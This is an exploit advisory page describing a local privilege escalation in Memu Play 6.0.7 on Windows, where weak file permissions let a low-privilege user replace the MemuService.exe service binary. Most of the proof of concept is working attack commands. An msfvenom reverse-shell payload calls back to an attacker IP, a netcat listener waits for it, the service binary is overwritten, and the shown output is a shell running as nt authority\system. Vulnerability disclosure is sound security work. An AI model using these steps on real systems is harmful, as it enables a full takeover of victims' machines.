Memu Play 6.0.7 Privilege Escalation

2019.02.22
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

# Exploit Title: Memu Play 6.0.7 - Privilege Escalation (PoC) # Date: 20/02/2019 # Author: Alejandra SA!nchez # Vendor Homepage: https://www.memuplay.com/ # Software Link: https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release # Version: 6.0.7 # Tested on: Windows 10 / Windows 7 # Description: # Memu Play 6.0.7 suffers from Privilege Escalation due to insecure file permissions # Prerequisites # Local, Low privilege access with restart capabilities # Details # By default the Authenticated Users group has the modify permission to ESM folders/files as shown below. # A low privilege account is able to rename the MemuService.exe file located in this same path and replace # with a malicious file that would connect back to an attacking computer giving system level privileges # (nt authority\system) due to the service running as Local System. # While a low privilege user is unable to restart the service through the application, a restart of the # computer triggers the execution of the malicious file. C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe" C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) Successfully processed 1 files; Failed processing 0 files C:\>sc qc MEmuSVC [SC] QueryServiceConfig SUCCESS SERVICE_NAME: MEmuSVC TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe LOAD_ORDER_GROUP : TAG : 0 # Proof of Concept 1. Generate malicious .exe on attacking machine msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT=443 -f exe > /var/www/html/MemuService.exe 2. Setup listener and ensure apache is running on attacking machine nc -lvp 443 service apache2 start 3. Download malicious .exe on victim machine Open browser to http://192.168.1.130/MemuService.exe and download 4. Overwrite file and copy malicious .exe. Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\ 5. Restart victim machine 6. Reverse Shell on attacking machine opens C:\Windows\system32>whoami whoami nt authority\system


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top